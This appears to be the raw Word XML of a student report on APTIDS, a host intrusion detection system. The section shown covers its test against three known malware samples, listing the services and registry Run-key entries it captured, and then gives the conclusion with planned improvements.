        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2754" w:rsidRDefault="008A2754" w:rsidP="008A2754">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DLCH store log file of those testing events as below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2754" w:rsidRDefault="008A2754" w:rsidP="008A2754">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F6546C" wp14:editId="20EF40A4">
            <wp:extent cx="5581650" cy="46818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1650" cy="4681855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2754" w:rsidRPr="00851DC4" w:rsidRDefault="008A2754" w:rsidP="00851DC4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc485303793"/>
      <w:r w:rsidRPr="00851DC4">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15</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00851DC4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log file of testing events stored in DLCH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2754" w:rsidRDefault="004D7C5A" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc485303755"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Real case Monitoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:r>
        <w:t xml:space="preserve">To test APTIDS in real environment, we deploy APTIDS in a local network and monitor the activities of some malware. </w:t>
      </w:r>
      <w:r w:rsidR="00BA52F8">
        <w:t>The sample of malwares in used and test results is described in the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8774" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2107"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="4810"/>
      </w:tblGrid>
      <w:tr w:rsidR="000550EA" w:rsidTr="00A60265">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRPr="00BA52F8" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA52F8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Malware Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1857" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRPr="00BA52F8" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA52F8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Malicious Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRPr="00BA52F8" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA52F8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Event Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000550EA" w:rsidTr="00A60265">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2107" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Kaptoxa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1857" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malware </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="000550EA" w:rsidP="00D87EF4">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Service Created: POSWDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000550EA" w:rsidTr="00A60265">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2107" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A91688" w:rsidRDefault="00A91688" w:rsidP="00A91688">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Proteus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1857" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="000550EA" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malware </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="00A91688" w:rsidP="00D87EF4">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Service Created: FrontCache3.0.0.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A91688" w:rsidRDefault="0015082A" w:rsidP="00D87EF4">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Registry key added:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0015082A" w:rsidRDefault="0015082A" w:rsidP="00D87EF4">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HKCU\\SOFTWARE\\Microsoft\\Windows </w:t>
            </w:r>
            <w:hyperlink r:id="rId66" w:history="1">
              <w:r w:rsidRPr="00AB0568">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>\\CurrentVersion\\Run</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0015082A" w:rsidRDefault="0015082A" w:rsidP="00D87EF4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>name: IChrome</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0015082A" w:rsidRDefault="0015082A" w:rsidP="00D87EF4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>value: C:\Users\Hung\AppData \Roaming\chrome.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000550EA" w:rsidTr="00A60265">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2107" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="00601780" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Keylogger. Ardamax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1857" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="00601780" w:rsidP="004D7C5A">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000550EA" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Registry key added:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00601780" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>HKLM\\SOFTWARE\\Wow6432Node\\ Microsoft\\Windows\\CurrentVersion\\Run</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00601780" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Name: DPBJ Agent</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00601780" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Value: C:\Windows\SysWoW64</w:t>
            </w:r>
            <w:r w:rsidR="00D87EF4">
              <w:t xml:space="preserve"> \28463</w:t>
            </w:r>
            <w:r>
              <w:t>\DPBJ.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BA52F8" w:rsidRPr="00BA52F8" w:rsidRDefault="00BA52F8" w:rsidP="00BA52F8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc485303806"/>
      <w:r w:rsidRPr="00BA52F8">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4</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3</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BA52F8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malware samples used for experiments and test results.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="00A91688" w:rsidRDefault="00A91688" w:rsidP="00A91688">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The result images the show information captured by APTIDS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A91688" w:rsidRDefault="00A91688" w:rsidP="00D87EF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Capture Kaptoxa event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601780" w:rsidRDefault="00A91688" w:rsidP="00601780">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1631ECD2" wp14:editId="14BCD481">
            <wp:extent cx="5581650" cy="615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81650" cy="615950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A91688" w:rsidRDefault="00601780" w:rsidP="00601780">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc485303794"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Capture Kaptoxa event</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00D87EF4" w:rsidRDefault="00D87EF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A91688" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Capture Proteus event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601780" w:rsidRDefault="00601780" w:rsidP="00601780">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCDA63D" wp14:editId="61034E45">
            <wp:extent cx="5581650" cy="13322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1650" cy="1332230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601780" w:rsidRPr="00D87EF4" w:rsidRDefault="00601780" w:rsidP="00D87EF4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc485303795"/>
      <w:r w:rsidRPr="00D87EF4">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17</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D87EF4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture Proteus event</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00601780" w:rsidRDefault="00D87EF4" w:rsidP="00D87EF4">
      <w:r>
        <w:t>Capture Keylogger.Ardamax event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D87EF4" w:rsidRDefault="00D87EF4" w:rsidP="00D87EF4">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77FE9D2D" wp14:editId="4A30726C">
            <wp:extent cx="5581650" cy="902335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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1650" cy="902335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D87EF4" w:rsidRPr="00D87EF4" w:rsidRDefault="00D87EF4" w:rsidP="00D87EF4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc485303796"/>
      <w:r w:rsidRPr="00D87EF4">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18</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D87EF4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture Keylogger.Ardamax event</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00D87EF4" w:rsidRPr="00D87EF4" w:rsidRDefault="00D87EF4" w:rsidP="00D87EF4"/>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="00A91688">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc485303756"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:r>
        <w:t>This is an early version of APTIDS which has the following functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Capture events adding or deleting Windows Service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Capture events modifying Registry Database by adding values or subkeys, modifying value and subkey names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Writing log to file for later forensic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Sending log data to DLCH for persistent storing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Sending log data to CLSS which has a SIEM implemented for storing, managing, searching and alerting on log. These abilities also require human resource for monitoring the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Forensic compromised host using a forensic toolkit allows us to indicate, isolate and terminate the threats early.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this is the first version of APTIDS, </w:t>
      </w:r>
      <w:r w:rsidR="00430FE0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>this solution does not operate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> perfectly for detecting most kind of APT intrusion and malware breach. Further work can be done for improving APTIDS abilities such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Identifying change of Registry value data and security attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Identifying change of Service attribute and information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Alert on known string of APT intrusion and malware samples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Adding module for real time monitoring file integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430FE0" w:rsidRDefault="0030797D" w:rsidP="0030797D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>APTIDS now can capture some malicious activities based on adding Re</w:t>
      </w:r>
      <w:r w:rsidR="00430FE0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>gistry value and Service entry, therefore,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> it can be used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>in reality for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> real time monitoring and alerting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030797D" w:rsidRPr="0030797D" w:rsidRDefault="00430FE0" w:rsidP="0030797D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
